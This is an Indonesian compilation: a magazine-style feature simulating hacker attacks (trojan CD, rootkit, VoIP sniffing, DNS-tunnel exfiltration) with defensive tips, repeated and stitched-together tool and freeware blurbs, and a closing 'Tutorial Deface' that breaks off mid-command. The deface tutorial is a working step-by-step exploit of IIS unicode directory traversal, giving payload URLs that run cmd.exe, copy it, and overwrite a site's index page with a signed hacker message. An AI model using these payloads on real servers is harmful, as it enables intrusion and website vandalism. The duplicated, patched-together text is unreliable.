Tips: Untuk melindungi diri dari tool semacam SwitchSniffer, gunakan baris perintah
berikut:
arp -s 192.168.0.1 00-aa-00-62-c6-09
Perintah di atas menetapkan secara definitif, alamat MAC yang dimiliki oleh alamat IP tertentu. Dalam contoh dipakai alamat sebuah router (sebagai penghubung ke Internet) yang sering dibelokkan.
Ethereal: SwitchSniffer membelokkan data, tapi tidak dapat menampilkannya. Dengan tool
ini Anda dapatmelakukannya.
Tips: Agar data Anda tidak ‘salah alamat’, bila perlu gunakan koneksi yang dienkripsi seperti HTTPS atau SSH.
Netcat: Dengan tool baris perintah ini, Anda dapat membangun sebuah koneksi tanpa proteksi
atau meng-copy file melalui jaringan dengan mudah, misalnya untuk mensimulasi sebuah server.
Tips: Hanya dengan sebuah baris, tool ini dapat menyediakan fungsi web-server.
Buatlah sebuah index.html tersendiri dan jalankan server dengan entri berikut:
netcat -l -p 80 < index.html
Ketikkan dalam kolom alamat 'http://127.0.0.1/' untuk mengaksesnya. Dalam jendela server dapat dibaca permintaanpermintaan sederhana browser.
ALL-IN-ONE SECRETMAKER 4.2.7 - freeware
http://www.secretmaker.com
Komplit, praktis, powerful, gratis: Banyaknya software keamanan yang ada di pasaran sekarang ini tentunya membuat Anda bingung memilih yang terbaik. Namun, semua masalah itu akan teratasi dengan software All-in-One Secretmaker 4.2.7.
Software ini menawarkan beberapa tool utama seperti Security Watchdog, Intruder Blocker, Spam Fighter, Pop-up Blocker, Banner Blocker,Movie Blocker, Privacy Protector, History Cleaners,Worm Hunter, Cookie Eraser, dan masih banyak lagi. Security Watchdog akan menjaga komputer dari para penyusup. Intruder Blocker dapat menjaga komputer dari spyware, trackware,dan virus.Spam Fighter akan membersihkan spam, dan juga dapat bekerja pada POP3 e-mail client. Banner Blocker akan mengurangi iklan-iklan yang tampil saat Anda berselancar. Movie Blocker menangkal iklan-iklan Flash yang dapat memperlambat aktivitas selancar Anda. Pop-up Blocker menghentikan popup yang tidak diinginkan. Privacy Protector akan menyembunyikan identitas Anda ketika berselancar. Terakhir, Cookie Eraser dan History Cleaner akan menghapus berbagai cookie dan jejak setelah Anda berselancar di dunia maya.
Apakah HDTV dapat direkam? Ternyata HDTV telah dapat dicrack!
Industri film ingin melengkapi semua format HDTV dengan proteksi copy HDCP. Dengan demikian, siaran HDTV tidak bisa direkam dan hanya bisa ditonton. Namun, blokade ini telah ditembus oleh sebuah minibox asal Korea dengan nama 'DVIHDCP'.
Ia mengubah sinyal yang diproteksi menjadi VGA dan dapat direkam tanpa masalah. Sebenarnya,
minibox ini tidak dirancang untuk pembajakan, tetapi untuk menampilkan HDTV melalui beamer/proyektor.
Para pengembang Firefox telah mengintegrasikan fungsi untuk menyingkirkan jejak-jejak yang masih tertinggal dalam Firefox setelah melakukan selancar. Buka "Tools | Clear private data", dan di bagian "Clear the following items now", aktifkan setiap jenis file yang akan dihapus, seperti "Cookies" dan "Cache". Selanjutnya,Anda tinggal menekan tombol "Clear private data now".
Sementara fungsi "Privacy" dalam menu "Tools | Options" tetap tersedia. Pada tab-tab "browsing History", "Saved Passwords", "Saved Form information", "Download History", "Cookies" dan "Cache" disediakan tombol-tombol untuk menghapus.
Namun, prosedur ini membutuhkan banyak klik. Jadi, bila Anda ingin menghapus semua data, metode "Clear Private Data" yang baru jauh lebih praktis.
pembicaraan telepon dapat dilakukan dengan mudah. Dengan simulasi
serangan berikut ini, Anda akan lebih memahami serangan hacker dan
bagaimana cara mengantisipasinya.
Anda telah melindungi PC dengan firewall, Antivirus dan Service Pack?
Apabila sudah, berarti PC Anda pun menjadi lebih aman dari serangan virus dan hacker. Namun, PC belum benar-benar aman sebelum Anda meng-install patch terbaru. Oleh karena itu, jangan heran bila sewaktu-waktu PC Anda kedatangan ‘tamu tak diundang'. Meskipun Anda telah meng-install patch terakhir, tidak ada jaminan PC Anda aman 100%. Dengan 0-Day-Exploits (celah yang belum dikenal dan di-patch), hacker dapat menembus firewall yang tampaknya aman hanya dalam beberapa detik. Bermodalkan sebuah CD yang telah dimodifikasi, firewall paling aman sekalipun dapat ditembus. Team penulis telah mempraktekkannya dan mensimulasi serangan-serangan paling berbahaya dengan metode-metode terbaru hacker, termasuk rootkits. Beberapa rekan dipilih sebagai target dalam simulasi serangan tersebut.
Hasilnya mengejutkan: Apabila diinginkan, penyerang dapat mengambilalih kendali PC korban dengan mudah. Bagaimana cara kerjanya dan langkah preventif apa yang efektif melindungi PC Anda? Ikuti ulasannya berikut ini.
1. Memata-matai Korban
Aturan nomor satu untuk seorang penyusup atau hacker yang sukses adalah mengenal musuhnya dengan baik. Salah satu cara efektif mengenal korban adalah mengetahui perilakunya saat memakai web browser. Oleh karena 90% peselancar masih menggunakan Internet Explorer, tugas
ini menjadi lebih mudah. Yang lebih menarik, masih banyak perusahaan-perusahaan yang menggunakan program Microsoft yang telah ter-install di PC.
Hacker hanya perlu memancing korban ke sebuah website yang telah dipersiapkan untuk itu dan memanfaatkan kelemahan browser.
Serangan: Kami berencana mengambilalih kendali browser atau dengan kata lain mengambil alih PC melalui sebuah buffer overflow exploit. Untuk itu, identitas software korban harus diketahui. Hal ini dapat dilakukan dengan memancing korban untuk berselancar ke sebuah alamat online yang telah dirancang untuk dapat mengidentifikasi browser-nya. Dengan demikian nama browser dan versinya dapat diketahui. Semakin baru patch yang di-install pada browser, semakin kecil pula peluang browser tersebut untuk diserang. Oleh karena itu, identitas browser yang digunakan korban perlu diketahui. Untungnya, browser langsung mengirimkan informasi identitasnya tersebut dengan membacanya kemudian melalui protokol webserver. Versi filenya juga perlu diketahui, karena kebanyakan buffer overflow hanya berfungsi dengan versi-versi browser tertentu. Selanjutnya, kami menemukan sebuah 0-Day-Exploit serbaguna yang terdapat pada Internet Explorer 6. 0-Day-Exploit digunakan sebagai istilah bagi celah keamanan yang sangat baru dan belum memiliki patch khusus untuk memperbaikinya.
Kami memperoleh informasi tambahan dari hacker FrSIRT yang mendemonstrasikan celah keamanan 'Proof of Concept' tersebut. Ia memberi tahu di mana tepatnya celah dapat dimanfaatkan sehingga mempermudah untuk memulai sebuah serangan.
Pada contoh, cukup dengan menjalankan program kalkulator Windows, kami dapat menyusupkan sebuah backdoor ke dalam scr i pt-nya. Backdoor tersebut selanjutnya menjadi ‘pintu masuk’ tool-tool berbahaya lainnya ke dalam sistem. scr i pt backdoor yang dibutuhkan banyak tersedia di Internet, sehingga serangan dapat dilakukan dengan mudah melalui perintah copy dan paste layaknya seorang scr i pt-kiddie. Kini kami harus mengupayakan agar korban tersebut membuka website yang telah dipersiapkan. Oleh karena itu, kami mengirimkan e-mail dengan link khusus yang dianggap akan sangat menarik korban untuk mengkliknya. Dengan trik sederhana ini, serangan berhasil dilakukan tanpa masalah. Setelah korban mengklik link tersebut, Internet Explorer terbuka dan langsung crash. Hal ini menandakan sebuah backdoor telah sukses diinstall dalam PC korban.
Penangkal: Gunakan browser alternatif seperti Firefox atau Opera. Para pakar sekuriti memang telah menemukan celah keamanan berbahaya dalam browser-browser tersebut, tetapi celah tersebut lebih jarang dimanfaatkan hacker. Biasanya hacker lebih menyukai Internet Explorer karena lebih sering digunakan.
Perhatian: Jangan sembarang membuka link dalam e-mail. Perlakukan e-mail dari pengirim yang tidak Anda kenal dengan sangat hati-hati.
2. Menembus Firewall
Bagaimana melakukan penipuan dan penyamaran dengan sempurna penting bagi seorang spionase. Begitu pula halnya hacker yang ingin menyusupkan trojan dalam sebuah CD tanpa menimbulkan
kecurigaan siapapun. Dengan demikian, pengguna sama sekali tidak menyadari bahaya apa saja yang mengancam. Banyak yang tidak mengetahui bahwa sebuah CD demo dengan tampilan awal dan isi yang menarik bisa mengandung sebuah trojan.
Serangan: Kali ini, kami tidak menginstall sebuah backdoor untuk memasukkan trojan, melainkan memanfaatkan kapasitas media dan langsung mengemas trojan pada CD. Tool yang dipilih adalah trojan klasik ‘Back Orifice 2000’. Pertimbangannya karena trojan open source ini mudah dimodifikasi. Cukup dengan sedikit kode baru dan sebuah compiler lain, maka trojan ini sudah tidak dapat dideteksi oleh kebanyakan Antivirus. Agar trojan ter-install saat CD dimasukkan ke dalam drive, kami menggunakan sebuah CD demo yang sudah tersedia dan membuat rutin setup dengan tool gratis Nullsoft scr i ptable Install System (NSIS). Bedanya, kali ini instalasinya juga menyertakan sebuah trojan. Sebagai tambahan, kami melengkapi trojan tersebut dengan fungsi eksekusi otomatis. Dengan demikian, proses instalasi secara otomatis akan aktif saat CD dimasukkan ke dalam drive. Kini, korban pun hanya perlu memasukkan CD dan trojan dapat langsung beraksi. Dalam contoh, trojan tersebut dapat mencatat semua ketikan pada keyboard dan melaporkannya. Fungsi ini berguna bagi hacker yang ingin mengetahui perilaku korban dan data-data rahasia yang ada di PC-nya. Penangkal: Tidak ada penangkal sempurna untuk serangan seperti ini. Akan tetapi, hal yang berlaku pada e-mail juga berlaku pada CD yaitu jangan menginstall program yang tidak Anda kenal. Dalam prakteknya, hal tersebut sulit dilakukan. Cara yang lebih baik adalah memakai sebuah PC tes khusus, di mana trojan tidak menimbulkan kerusakan ke PC lainnya karena tidak terhubung ke jaringan.
3. Menjadi Tidak Terlihat.
Pakem ketiga dalam spionase adalah bagaimana melakukan penyusupan sekaligus tetap tidak terlihat. Dalam spionase PC ini berarti diperlukan sebuah rootkit. Untuk itu, sebuah backdoor sederhana harus diubah menjadi sebuah super trojan. Sekali masuk ke dalam sistem, trojan tersebut sulit ditemukan sehingga akan lebih sulit lagi untuk disingkirkan.
Rootkit paling terkenal untuk Windows adalah ‘FU Rootkit’. Rootkit ini menyembunyikan program perusak dalam Task Manager. Dengan demikian, trojan tidak lagi dapat dihentikan. Rootkit modern seperti ‘Beast’ bahkan lebih banyak lagi bersembunyi antara lain pada entri
registry, koneksi TCP/IP, dan file-file dalam hard disk.
Tanpa program khusus, seorang pengguna tingkat mahir sekalipun tidak dapat menemukan trojan tersebut, apalagi menyingkirkannya. Hal ini disebabkan rootkit membelokkan fungsi-fungsi Windows dan memanipulasi jawaban yang dibutuhkan oleh Antivirus biasa (lihat boks
Rootkit: Bahaya yang Tidak Tampak).
Serangan: kami memodifikasi ‘Back Orifice 2000’ dengan sebuah fungsi rootkit 'FU Rootkits'. Hal ini dapat dilakukan dengan mudah seperti halnya Anda mengintegrasikan sebuah plug-in ke Photoshop. Satu-satunya yang harus dilakukan adalah menginstall sebuah plugin rootkit dan
menentukan, file-file mana yang nantinya tidak terlihat oleh pengguna. Untuk tujuan tes, kami menyembunyikan trojan dan semua file yang dibuat, misalnya file protokol keylogger.
Penangkal: Untuk menghadapi teknik stealth seperti ini, hampir tidak ada yang dapat Anda lakukan. Sekali trojan berhasil ter-install pada sistem, maka trojan tersebut hanya dapat disingkirkan dengan tool khusus, seperti Rootkit Revealer dari Sysinternals.
Selain itu, Anda pun harus mengenal sistem PC Anda dengan baik untuk dapat menemukan trojan tersebut. Hal ini disebabkan, informasi seperti alamat penyimpanan dan fungsi-fungsi Windows harus benar-benar dipahami. Hal dilematis ditemui pada program yang tidak berbahaya,
seperti Daemon Tools. Tool gratis yang digunakan untuk membuat virtual drive ini sayangnya juga menggunakan teknik seperti rootkit untuk mengintegrasikan diri ke dalam sistem agar tidak terlihat.
ROOTKIT: BAHAYA YANG TIDAK TAMPAK
Cara Hacker Mengelabui Antivirus Rootkit ‘bercokol’ sangat jauh di dalam sistem operasi sehingga program-program keamanan umumnya sering tidak dapat mendeteksinya. Trojan canggih ini merupakan rangkaian tool yang dapat mencatat password, memberi akses kepada hacker,
merekam input keyboard, atau menyadap informasi dalam jaringan tanpa terlihat.
Spesialis keamanan F-Secure pernah memperingatkan bahaya rootkit yang masih menyimpan potensi besar untuk menyamarkan virus dan worm. Sekarang pun sudah ada worm yang menggunakan metode rootkit Sony (lihat boks Proteksi dengan Metode Hacker).
Kehadiran rootkit seringkali tidak terdeteksi oleh Antivirus. Berbeda dengan malware biasa yang bekerja pada level pengguna, rootkit mengaitkan dirinya ke dalam Windows API (Application Program Interface). Melalui API, program-program, termasuk Antivirus dan firewall, mengaktifkan fungsi-fungsi dasar sistem operasi, seperti akses ke hard disk atau registry.
Tahap selanjutnya, rootkit menghadang setiap permintaan dan menentukan data mana saja yang boleh dilihat oleh aplikasi keamanan. Apabila sebuah pembasmi virus mencari nama file rootkit, semua entri tersebut disaring dari jawaban yang diberikan sistem operasi. Dengan demikian trojan tidak ditemukan.
Cara menemukan rootkit: Untungnya, sebagian besar rootkit Windows masih belum sempurna dikembangkan. Misalnya trojan 'Slanret' yang dirancang sebagai systemdriver sehingga dapat terlihat pada Windows Safe Mode. Selain itu, Slanret pun sering menyebabkan crash.
Petunjuk-petunjuk lainnya yang dapat digunakan untuk mengetahui kehadiran rootkit antara lain kapasitas hard disk yang berkurang drastis, performa CPU yang turun drastis tanpa alasan jelas, dan koneksi Internet yang tidak dikenal. Para pengguna PC tingkat lanjut biasanya menggunakan tool Rootkit Revealer untuk menemukan API mana saja yang dibelokkan. Ia pun dapat membandingkan file-file pada hard disk dengan backup 'bersih' yang telah dibuat sebelumnya.
Cara menyingkirkan rootkit: Solusi ekstrim yang paling ampuh menyingkirkan rootkit atau tool hacker lainnya adalah mem-format hard disk dan meng-install sistem baru.
Sebagai langkah preventif, Anda pun harus mengganti semua password. Tool khusus untuk melacak dan menghapus rootkit seperti RootkitRevealer (http://www.sysinternals.com) atau BlackLight (http://www.fsecure.com) rumit digunakan dan lebih cocok bagi pengguna PC yang mahir. Tool sederhana untuk menyingkirkan berbagai varian rootkit, misalnya rootkit pada proteksi copy CD Audio Sony, sayangnya belum tersedia. Rootkit memiliki satu kesamaan dengan malware
biasa: PC dengan firewall dan Antivirus yang telah dipatch tidak dapat diinfeksi olehnya, dengan syarat pengguna tidak sembarangan membuka lampiran email mencurigakan dan tidak men-download filefile dari pembuat yang tidak dikenal.
Info: http://www.rootkit.com
PROTEKSI DENGAN METODE HACKER
Cara Perusahaan Menggunakan Trik Hacker Yang membeli CD audio Sony BMG, printer Xerox, atau sebuah game dari Blizzard Entertainment tidak menduga ada trik-trik hacker yang licik. Sayangnya, apa dilakukan perusahaan-perusahaan besar ini masih tergolong zona ‘kelabu’ dari sisi hukum.
- CD Audio Menelepon ke Rumah
Untuk memproteksi musiknya dari pembajakan, Sony BMG menggunakan sebuah proteksi copy yang tidak lazim. Apabila Anda ingin mendengar musiknya pada sebuah PC Windows, sebuah player yang termuat dalam CD perlu Anda install. Masalahnya, ada hal lain yang dirahasiakan
kepada pengguna. Bersama player, ter-install juga rootkit yang menyembunyikan file-file proteksi copy dari pembajak. Hal ini baru terungkap setelah seorang programmer Mark Russinovich dari Sysinternals mempublikasikannya. Proteksi copy yang disebut XCP ini menyebabkan sistem operasi tidak stabil dan membuat koneksi ke Internet.
Untuk menangkalnya, Blizzard membaca baris judul setiap program yang aktif dan meneruskannya ke game server. Bahayanya, jika saat itu sebuah jendela online banking terbuka, informasinya juga akan diteruskan.
- ID Tersembunyi pada Printer Xerox
Jangan pernah mencetak dokumen penting atau rahasia dengan printer berwarna Xerox. Masalahnya, pada setiap lembar cetakan juga tercetak code yang nyaris tidak terlihat. Temuan ini pertama kali dipublikasikan oleh lembaga swadaya EFF (Electronic Fronter Foundation) di AS. Kodenya berisi nomor seri dan nomor ID lainnya (tanggal, jam). Dengan demikian, tanpa nama pemiliknya pun sebuah hasil cetakan dapat diketahui asalnya. Kode berukuran beberapa mm yang terdiri atas titik-titik kuning kecil ini hanya dapat ditemukan, bila kita tahu di mana harus mencarinya. Selanjutnya kode tersebut perlu diperbesar 10x di bawah mikroskop.
Pihak mana yang mendapat manfaatnya tidak jelas. Spekulasinya mulai dari bagian support Xerox hingga dinas rahasia AS. Setelah EFF mempublikasikan informasi tersebut, Xerox langsung mengadakan konferensi pers. Mereka berdalih, metode tersebut dipakai untuk mencegah terjadinya praktek pemalsuan dokumen.
4. Menyadap Telepon
Mendengarkan semuanya dan tidak menceritakan apa pun adalah aturan keempat. Menyadap pembicaraan telepon sudah lama bukan lagi hak istimewa dinas rahasia. Apabila beberapa tahun lalu banyaknya celah dalam instalasi ISDN menarik para hacker, kini sasarannya beralih ke penyadapan telepon VoIP di Internet.
Serangan: Untuk tujuan demo, kami menjalankan tool ‘Cain & Abel’ yang ada di Internet. Tool ini bukan hanya memiliki fungsi hacking umum, seperti membongkar password, melainkan juga memungkinkan Anda mencatat website yang paling sering dikunjungi dan merekam pembicaraan
telepon sebagai file WAV. Syaratnya hanyalah hacker harus terhubung dengan jalur yang dilewati semua data.
Caranya adalah melalui sebuah koneksi (W)LAN atau sebuah trojan pada PC salah satu korban. Kami memulainya dengan sebuah serangan 'man-in-the-middle' dan menyadap aliran data korban. Untuk itu, trojan harus diperintahkan untuk mengirimkan datanya kepada CHIP terlebih dulu. Setelah sukses menghadangnya (menyadap), datanya langsung diteruskan ke PC yang dituju. Para korban (pengirim dan penerima) sendiri sama sekali tidak menyadari penyadapan tersebut.
Penangkal: Langkah termudah yang dapat langsung ditempuh adalah mengamankan LAN dengan filter alamat MAC dan menginstall Antivirus untuk menangkal trojan. Selain itu, kini tersedia solusi untuk mengenkripsi pembicaraan VoIP, seperti tool Zfone dari sang penemu PGP, Phil Zimmerman.
Masalahnya, hanya terletak pada aspek kompatibilitasnya. Tidak semua provider mendukung beberapa versi Zfone sehingga pengguna pun kehilangan privasinya.
5. Mengirimkan Data Keluar
Aturan terakhir dan terpenting adalah jangan ketahuan saat sedang memata-matai.
Meng-install sebuah trojan barulah setengah perjalanan karena tanpa koneksi balik, trojan tercanggih pun tidak ada gunanya. Oleh karena infrastruktur jaringan korban tidak jelas diketahui, kami harus bersiap menghadapi berbagai jenis firewall, terutama desktop firewall yang dapat memblokir setiap program aktif, dan sebuah IDS (Intrusion Detection System)
yang menganalisis isi setiap paket. Artinya, tidak cukup sekadar mengirim data dari PC. Informasinya juga harus tersamar dengan baik sehingga tidak mencolok bagi program keamanan.
Tool 'Back Orifice 2000' hampir tidak menyediakan plugin gratis yang tepat untuk tujuan tersebut. Satu-satunya plugin 'SCTP' memang mengenkripsi data dengan baik sehingga tidak ada pola yang dapat dikenali. Sayangnya metode ini juga masih berciri sebagai sebuah komunikasi
trojan. Bagi seorang hacker andal dengan ‘bekal’ metode penyelundupan data yang memadai,
firewall dapat saja ditembus.
Serangan: Cara yang paling digemari adalah dengan memanfaatkan protokol yang tampak tidak berbahaya seperti HTTP, SMTP atau DNS. Kami memilih metode DNS tunnel agar dapat melewati semua pengujian keamanan dalam jaringan tanpa menimbulkan kecurigaan. Artinya, informasi itu dikemas ke dalam paket Domain Name yang tidak mencolok. Paket jenis ini tidak diblokir oleh lebih dari 90% firewall karena protokol DNS mutlak diperlukan untuk menciptakan koneksi
Internet. Kami mengenkripsi sedikit informasinya dan mengirim sedikit mungkin paket agar IDS tidak mengetahuinya.
Sebuah pertukaran paket Domain Name yang berlebihan akan mencurigakan dan diketahui oleh IDS.
Untuk mengatasi proteksi desktop firewall, kami menggunakan jenis serangan injection. Artinya, kami memilih sebuah program yang dapat dijamin tidak diblokir oleh firewall, misalnya browser standar. Terserah, apakah browser tersebut adalah Internet Explorer atau Firefox.
Anda dengan mudah dapat mengetahuinya melalui registry Windows yang dibaca dengan sebuh trojan khusus. Kini, kami hanya perlu menunggu hingga korban yang tidak tahu-menahu tersebut mengaktifkan program dan meload-nya ke dalam memori (RAM). Saat hal tersebut dilakukan, trojan mengaitkan diri ke dalam proses yang tepat dan memanfaatkannya untuk tujuan tertentu.
Untuk mengetahui sukses tidaknya penyelundupan data, kami memerintahkan trojan untuk mengirimkan dokumen Word milik korban. Tentunya, tanpa diketahui pemiliknya dan firewall.
Penangkal: Persaingan antara perusahaan sekuriti dan hacker akan terlihat seperti ‘lingkaran setan’. Firewall, Antivirus, dan IDS memang semakin baik dalam mendeteksi dan memblokir berbagai serangan, tetapi serangan hacker pun semakin canggih. Semakin baik hacker mengenal sasarannya, semakin sukar ia diidentifikasi. Masalahnya, untuk setiap mekanisme proteksi
biasanya ada trik untuk mengatasinya. Oleh karena itu, vital artinya seorang administrator
untuk menjaga PC dan program-program keamanannya agar selalu aktual.
http://www.rootkit.com: Website dengan topik
rootkit yang paling populer. Di sana Anda akan mendapatkan banyak berita seputar rootkit dan informasi teknisnya.
http://www.bo2k.com: Website tool remote network administration yang dikembangkan berdasarkan trojan klasik Back Orifice.
http://www.securityfocus.com: Website ini menyediakan berita seputar keamanan PC terbaru dan ulasan detail dari pakarnya.
Tool-Tool Para Hacker
Antisipasi serangan hacker dengan mengetahui cara kerjanya. Berikut ini adalah tool-tool yang dapat digunakan untuk mengamankan jaringan Anda.
Nmap: Dengan port scanner ini, semua port yang terbuka dan alamat IP dalam jaringan dapat
diketahui. Dengan demikian, celah keamanan pun dapat ditutup.
Tips: Untuk memeriksa semua PC dan port dalam jaringan Anda, ketik perintah berikut ini.
nmap - v - sS- O 192.168.*.*
Apabila ada port yang kerap menjadi incaran hacker terbuka, tutup segera untuk mengindari serangan.
SwitchSniffer: PC yang terhubung dengan switch di jaringan menerima paket data yang ditujukan kepadanya. Dengan tool ini Anda dapat ‘membelokkan’paket tersebut.
Tips: Untuk melindungi diri dari tool semacam SwitchSniffer, gunakan baris perintah
berikut:
arp -s 192.168.0.1 00-aa-00-62-c6-09
Perintah di atas menetapkan secara definitif, alamat MAC yang dimiliki oleh alamat IP tertentu. Dalam contoh dipakai alamat sebuah router (sebagai penghubung ke Internet) yang sering dibelokkan.
Ethereal: SwitchSniffer membelokkan data, tapi tidak dapat menampilkannya. Dengan tool
ini Anda dapatmelakukannya.
Tips: Agar data Anda tidak ‘salah alamat’, bila perlu gunakan koneksi yang dienkripsi seperti HTTPS atau SSH.
Netcat: Dengan tool baris perintah ini, Anda dapat membangun sebuah koneksi tanpa proteksi
atau meng-copy file melalui jaringan dengan mudah, misalnya untuk mensimulasi sebuah server.
Tips: Hanya dengan sebuah baris, tool ini dapat menyediakan fungsi web-server.
Buatlah sebuah index.html tersendiri dan jalankan server dengan entri berikut:
netcat -l -p 80 < index.html
Ketikkan dalam kolom alamat 'http://127.0.0.1/' untuk mengaksesnya. Dalam jendela server dapat dibaca permintaanpermintaan sederhana browser.
ALL-IN-ONE SECRETMAKER 4.2.7 - freeware
http://www.secretmaker.com
Komplit, praktis, powerful, gratis: Banyaknya software keamanan yang ada di pasaran sekarang ini tentunya membuat Anda bingung memilih yang terbaik. Namun, semua masalah itu akan teratasi dengan software All-in-One Secretmaker 4.2.7.
Software ini menawarkan beberapa tool utama seperti Security Watchdog, Intruder Blocker, Spam Fighter, Pop-up Blocker, Banner Blocker,Movie Blocker, Privacy Protector, History Cleaners,Worm Hunter, Cookie Eraser, dan masih banyak lagi. Security Watchdog akan menjaga komputer dari para penyusup. Intruder Blocker dapat menjaga komputer dari spyware, trackware,dan virus.Spam Fighter akan membersihkan spam, dan juga dapat bekerja pada POP3 e-mail client. Banner Blocker akan mengurangi iklan-iklan yang tampil saat Anda berselancar. Movie Blocker menangkal iklan-iklan Flash yang dapat memperlambat aktivitas selancar Anda. Pop-up Blocker menghentikan popup yang tidak diinginkan. Privacy Protector akan menyembunyikan identitas Anda ketika berselancar. Terakhir, Cookie Eraser dan History Cleaner akan menghapus berbagai cookie dan jejak setelah Anda berselancar di dunia maya.
Apakah HDTV dapat direkam? Ternyata HDTV telah dapat dicrack!
Industri film ingin melengkapi semua format HDTV dengan proteksi copy HDCP. Dengan demikian, siaran HDTV tidak bisa direkam dan hanya bisa ditonton. Namun, blokade ini telah ditembus oleh sebuah minibox asal Korea dengan nama 'DVIHDCP'.
Ia mengubah sinyal yang diproteksi menjadi VGA dan dapat direkam tanpa masalah. Sebenarnya,
minibox ini tidak dirancang untuk pembajakan, tetapi untuk menampilkan HDTV melalui beamer/proyektor.
Para pengembang Firefox telah mengintegrasikan fungsi untuk menyingkirkan jejak-jejak yang masih tertinggal dalam Firefox setelah melakukan selancar. Buka "Tools | Clear private data", dan di bagian "Clear the following items now", aktifkan setiap jenis file yang akan dihapus, seperti "Cookies" dan "Cache". Selanjutnya,Anda tinggal menekan tombol "Clear private data now".
Sementara fungsi "Privacy" dalam menu "Tools | Options" tetap tersedia. Pada tab-tab "browsing History", "Saved Passwords", "Saved Form information", "Download History", "Cookies" dan "Cache" disediakan tombol-tombol untuk menghapus.
Namun, prosedur ini membutuhkan banyak klik. Jadi, bila Anda ingin menghapus semua data, metode "Clear Private Data" yang baru jauh lebih praktis.
Tutorial Deface
Tutorial deface ...
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : http://www.target.loe contoh-->> http://www.target.com
2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.) Cari halaman index ke http://www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrooti ndex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
